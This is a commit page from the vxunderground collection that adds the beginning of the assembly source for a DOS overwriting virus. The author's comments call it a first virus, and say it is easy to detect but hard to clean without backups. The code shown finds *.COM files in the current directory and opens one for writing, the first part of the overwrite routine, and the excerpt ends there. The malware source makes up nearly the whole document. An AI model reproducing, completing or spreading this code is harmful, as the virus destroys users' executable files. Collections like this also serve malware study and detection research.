re-organize

push
This commit is contained in:
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
@@ -0,0 +1,23 @@
;AuVS.tiny.OVERWRITING.0001
;My 1st VIRUS!!!!!!!!!!!!!!
;This is an extremely simple overwriting, tiny virus, that is easy to
;detect, but there's not much to do to clean it if you have no backups
;F-PROT detects this as an unknown TRIVIAL variant
START:
mov ah,4Eh ;Find first *.COM file in current dir
lea dx,OFFSET MASK ;*.COM
xor cx,cx ;xero out da register
int 21h ;find
mov dx,009Eh ;file handle
mov ax,3D01h ;open file for writing